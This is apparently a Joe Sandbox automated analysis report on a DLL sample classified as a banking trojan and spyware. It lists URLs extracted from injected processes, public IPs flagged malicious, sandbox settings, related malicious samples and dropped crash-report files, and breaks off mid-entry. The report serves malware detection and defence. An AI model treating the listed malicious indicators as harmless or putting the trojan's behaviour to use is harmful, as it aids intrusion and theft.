http://https://file://USER.ID%lu.exe/upd	rundll32.exe, 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.tiktok.com/legal/report/feedback	RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://curlmyip.netQ8tR9QJN7lLzOLlefile://c:	RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609045780.0000028A77C7D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000013.00000002.608045211.0000019843E7F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ns.adobe.cmge	RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.disneyplus.com/legal/privacy-policy	RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ipinfo.io/ip	RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	false		high
http://constitution.org/usdeclar.txt	rundll32.exe, 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft.coQ	powershell.exe, 00000013.00000003.596263415.000001985C0A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe.uxEN	RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://disneyplus.com/legal.	RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000013.00000002.606222894.0000019843C71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://help.disneyplus.com.	RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.56.146.148	unknown	unknown	10753	LVLT-10753US	true
146.70.35.138	unknown	United Kingdom	2018	TENET-1ZA	true
67.43.234.14	unknown	Canada	36666	GTCOMMCA	true
67.43.234.37	unknown	Canada	36666	GTCOMMCA	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	613908
Start date and time: 22/04/202216:13:40	2022-04-22 16:13:40 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	d6YCUW421p (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	57
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	5
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.bank.troj.spyw.evad.winDLL@77/41@6/5
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 21.2% (good quality ratio 20.1%) Quality average: 81% Quality standard deviation: 28.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 165 Number of non-executed functions: 212
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
Execution Graph export aborted for target cmd.exe, PID 6660 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 6876 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:14:55	API Interceptor	1x Sleep call for process: rundll32.exe modified
16:15:03	API Interceptor	2x Sleep call for process: WerFault.exe modified
16:15:34	API Interceptor	41x Sleep call for process: powershell.exe modified
16:17:43	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	cmicPQEC.exe	Get hash	malicious	Browse	208.67.222.222
	624c5d1e2a846.dll	Get hash	malicious	Browse	208.67.222.222
	sawepnTfU6.exe	Get hash	malicious	Browse	208.67.222.222
	lia.exe	Get hash	malicious	Browse	208.67.222.222
	gozi.exe	Get hash	malicious	Browse	208.67.222.222
	2GEg45PlG9.exe	Get hash	malicious	Browse	208.67.222.222
	FpYf5EGDO9.exe	Get hash	malicious	Browse	208.67.222.222
	anIV2qJeLD.exe	Get hash	malicious	Browse	208.67.222.222
	gECym.dll	Get hash	malicious	Browse	208.67.222.222
	data.dll	Get hash	malicious	Browse	208.67.222.222
	test1.dll	Get hash	malicious	Browse	208.67.222.222
	test1.dll	Get hash	malicious	Browse	208.67.222.222
	97Ys56eAFo.dll	Get hash	malicious	Browse	208.67.222.222
	new_working_conditions[2021.09.23_12-51].xlsb	Get hash	malicious	Browse	208.67.222.222
	20210915_id99.dll	Get hash	malicious	Browse	208.67.222.222
	presentation[2021.09.09_15-26].vbs	Get hash	malicious	Browse	208.67.222.222
	sample.vbs	Get hash	malicious	Browse	208.67.222.222
	345678.vbs	Get hash	malicious	Browse	208.67.222.222
	start[526268].vbs	Get hash	malicious	Browse	208.67.222.222
	documentation_446618.vbs	Get hash	malicious	Browse	208.67.222.222
myip.opendns.com	cmicPQEC.exe	Get hash	malicious	Browse	84.17.52.18
	624c5d1e2a846.dll	Get hash	malicious	Browse	102.129.143.67
	sawepnTfU6.exe	Get hash	malicious	Browse	102.129.143.61
	status.dll	Get hash	malicious	Browse	102.129.143.42
	lia.exe	Get hash	malicious	Browse	102.129.143.64
	gozi.exe	Get hash	malicious	Browse	102.129.143.64
	agent_installer (1).exe	Get hash	malicious	Browse	102.129.143.62
	agent_installer (1).exe	Get hash	malicious	Browse	102.129.143.62
	2GEg45PlG9.exe	Get hash	malicious	Browse	84.17.52.63
	FpYf5EGDO9.exe	Get hash	malicious	Browse	84.17.52.63
	anIV2qJeLD.exe	Get hash	malicious	Browse	84.17.52.63
	gECym.dll	Get hash	malicious	Browse	102.129.143.33
	data.dll	Get hash	malicious	Browse	102.129.143.57
	test1.dll	Get hash	malicious	Browse	102.129.143.57
	test1.dll	Get hash	malicious	Browse	185.32.222.18
	97Ys56eAFo.dll	Get hash	malicious	Browse	84.17.52.9
	new_working_conditions[2021.09.23_12-51].xlsb	Get hash	malicious	Browse	84.17.52.9
	OcEyzBswGm.exe	Get hash	malicious	Browse	84.17.52.41
	Invoice778465.xlsb	Get hash	malicious	Browse	185.189.150.74
	o0AX0nKiUn.dll	Get hash	malicious	Browse	84.17.52.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LVLT-10753US	o2AHUUgivh	Get hash	malicious	Browse	148.57.27.116
	i586-20220420-0452	Get hash	malicious	Browse	147.207.196.184
	boat.arm7	Get hash	malicious	Browse	217.22.66.248
	Ares.x86	Get hash	malicious	Browse	147.207.27.156
	cEmPMPmt3x	Get hash	malicious	Browse	200.1.79.159
	duzwG31xKW	Get hash	malicious	Browse	208.51.98.42
	sora.arm7	Get hash	malicious	Browse	147.3.147.111
	i686	Get hash	malicious	Browse	94.154.174.103
	7y68gqkCZX	Get hash	malicious	Browse	148.57.62.81
	hocku3bllE	Get hash	malicious	Browse	94.154.174.134
	McTQO3v9sY	Get hash	malicious	Browse	94.154.174.130
	UnHAnaAW.x86	Get hash	malicious	Browse	94.154.174.106
	IYs9pfEmU7	Get hash	malicious	Browse	94.154.174.106
	jh39kNVb6q	Get hash	malicious	Browse	94.154.174.144
	3cdz4j7tMm	Get hash	malicious	Browse	94.154.174.143
	aqua.arm7	Get hash	malicious	Browse	147.3.147.112
	Josho.arm7	Get hash	malicious	Browse	64.8.51.81
	sora.arm7	Get hash	malicious	Browse	148.57.49.88
	aqua.x86	Get hash	malicious	Browse	200.1.79.155
	aqua.arm7	Get hash	malicious	Browse	94.154.174.105

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_3fb78dbd3096a159cff8d7df2087ea8f72df4a_7cac0383_1a1ec4c1\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8489168017689993
Encrypted:	false
SSDEEP:	96:82XXFDSb1/nYyJy9haoB7JnxpXIQcQGc6McE+cw3/7+a+z+HbHgvAS/YyNlISWb/:82XxqnSHoIE/jKq/u7sQwS274ItW
MD5:	8C031B76B984FFB3775F8BB1F955175D
SHA1:	1792D0086EF05E7580C883BAEC6A1C9AB5A8384B
SHA-256:	D2B34A32EFA1DE46ACBB9F0956EE27E1A3DFA68156AA65D77F60E23C72BD5853
SHA-512:	0161CF8EFB3477ECD3EE5D78ACC4094DA567F97D812AAB0BF3F099840D07FC7FEA47C93F403A56C086DB5B36F5A5003618C1E20A8DA28F39AA5CBDA27A58BA1D
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.2.8.9.8.4.2.1.2.6.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.2.9.0.1.0.3.0.6.1.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.8.b.4.a.a.2.-.8.8.9.8.-.4.6.2.9.-.8.5.d.0.-.6.f.b.3.9.4.1.6.2.7.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.d.0.3.7.d.0.-.8.c.4.d.-.4.c.8.7.-.9.f.3.1.-.8.2.8.b.1.f.8.5.1.7.3.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.9.8.-.0.0.0.1.-.0.0.1.8.-.a.6.2.8.-.2.2.c.3.9.e.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_7875e6245bdd47cab51d5025544adb25af7c1d5b_7cac0383_19f2e3d2\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8457079504503605
Encrypted:	false
SSDEEP:	96:8iX9F58A1/nYysy9ha2KzfFEpXIQcQAc6VQcELcw3A+a+z+HbHgvAS/YyNlISWbN:8C9Fn5H+JQB6jKq/u7sQwS274ItW
MD5:	239227B919527B1ED5C683A088C5B832
SHA1:	348EA9C33130FD4987535BDDF1BF2C7A5F11AAEA
SHA-256:	BEFE7B14F1828EEF0D5797D2A21434657431BA55C4CAD5E1B8E7E933DA715D7B
SHA-512:	E43C0FC89549E2159029F7C43970748C49216A93459FF4BD73ECC141D65A5068903961DFDE4B6EF17E606EDA0E741E4341510627D9280819F1E0033BE7701A41
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.2.9.0.7.6.2.3.5.4.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.2.9.1.0.3.7.3.5.1.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.9.f.0.4.6.0.-.d.7.3.e.-.4.1.1.e.-.b.1.1.d.-.f.f.e.7.2.0.0.8.4.8.0.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.b.6.b.9.5.4.-.2.2.8.3.-.4.b.8.6.-.8.9.9.4.-.0.c.9.6.4.9.e.8.d.2.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.9.8.-.0.0.0.1.-.0.0.1.8.-.a.6.2.8.-.2.2.c.3.9.e.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_a0b9814f9a8146de5cfec8d14bee9aa28ce9d7_7cac0383_11cea998\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8427022275254693
Encrypted:	false
SSDEEP:	96:xbQMFL1/nYywy9ha2K7FISZpXIQcQGc6McE+cw3/7+a+z+HbHgvAS/YyNlISWbS/:xs8RnaHoIE/jKq/u7sQwS274Itb
MD5:	8B1E65DE729358962175804BE41A5F2D
SHA1:	4CBC27A28D667D2173561DD64CD24D861D547050
SHA-256:	FF676378BD954F762192C45AF6135C3E1C692D8846A88B5CA947A525C2FCB57A
SHA-512:	BF6922A8C214E97361A7A479BE3E9C08C5AFE18106CE82F2EAC1E116A5963AD5B2A9FD9062812CD2FA059374DD296428D3F73B0DB4CB5C09083859B4874E4C4F
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.2.8.9.3.6.8.7.7.9.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.5.8.c.c.b.0.-.a.d.1.7.-.4.9.f.a.-.b.0.8.d.-.2.a.1.b.2.d.2.1.6.6.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.5.c.7.6.f.d.-.9.b.f.8.-.4.c.9.d.-.b.c.3.9.-.4.8.6.7.6.1.1.1.e.6.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.9.8.-.0.0.0.1.-.0.0.1.8.-.a.6.2.8.-.2.2.c.3.9.e.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F47.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 22 23:14:54 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	40078
Entropy (8bit):	2.0516019755266033
Encrypted:	false
SSDEEP:	192:d54ROb/XeaV3qO3TvQ2yBFcZOQx2M2APOmRA4GTeDc/X/h:LbR13zQ2yYIkYYOmRTk/XZ
MD5:	F945699442413D17B98030FD8B59BF3F
SHA1:	30803FA01F2D979EE5E481DD9828DA3E7FCDDC6D
SHA-256:	D6504D1EC8512903B41E6E24AEA1E2CD3031F030FE126EB59E4CD88586F52D35
SHA-512:	0D703BFA0955984000957238669E7E97DD823E151F558F7F7B4C8D2027F11964B26CD287C1316C84A56BA76EA53EE3247A27667984CC67530C896D48D189AAAD
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ........6cb........................4...........$................)..........`.......8...........T........... ...n............................................................................................U...........B..............GenuineIntelW...........T............6cb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA3BD.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8348
Entropy (8bit):	3.6903285459126125
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiuv6A+ou6YfoSU2agmfbS1CpNM89bxf1f3bm:RrlsNi26n6YgSU2agmfbSyxNfi
MD5:	67355ED11A4EA0C1FD1B595EF9946717
SHA1:	D246366FCF5482CC166E9C0ABFF4324F4916D272
SHA-256:	9449C9132634293A63DB71ABA38DA26971A44306EDFCC7FBBFEE1B4211439753
SHA-512:	269E99F89B99C445E5CCF6C6D43F98AAD97BFE767E53DE57E0082EC2C7A3C6F88F5B50F8B5B054FC2EC35A051DB402DF90EF554923F986B52E5B886650BA0C05
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.<./.P.i.d.>.........

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA554.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4665
Entropy (8bit):	4.426958524168873
Encrypted:	false
SSDEEP:	48:cvIwSD8zsUJgtWI9cKWgc8sqYjhZ8fm8M4J2+QFrYHo+q8vQ+fKcQIcQw0Gd:uITfSTrgrsqY1eJpoKjKkw0Gd
MD5:	6F226F9CC303D01E54357E5ACAF7E3BF
SHA1:	4F9A862A25C62CC6099E318656CD61536B0CA204
SHA-256:	340E05C26B91FFBED952FCC77AE81B1D0BB9BEAB67C3ADA6C7A9CF549F532F47
SHA-512:	F3871C70BF98C2376810E277D936AECC9B46082A7D0DE61117645CBE11707D34953F8803919AFEA96554AC7E4C3CE6A96B2919D7ECB1B2291CD051BA1FBF60A1
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483705" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1C6.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 22 23:14:59 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	39878
Entropy (8bit):	2.022025674967719
Encrypted:	false
SSDEEP:	192:E5p8/XeajR3u/y5O3TvdCcyBFcZsx2M2AmmZ3bDpi7cGpctud:Q67R+q83zZyYWYtmZ3lu
MD5:	E86AB660FD04033014FCBE3A9DB7FF19
SHA1:	51AAF21EBB82A4663448F92B472026BFAB3A92F2
SHA-256:	3AF7A03A84A6F6A605486ED31A7A56971DA54B2939F207FA997E3CC916F79ED4
SHA-512:	73571BA9B38A02AE27DDC445ED30A6B0A3594F2C6A8ACEE2ECF422E872835B782B81B358FD91670C3A21B77FB3EFE5972E3AD39440B9F1A0FE89C27313D0BE32
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ........6cb........................4...........$................)..........`.......8...........T........... ................................................................................................U...........B..............GenuineIntelW...........T............6cb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB580.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8334
Entropy (8bit):	3.6988611677147167
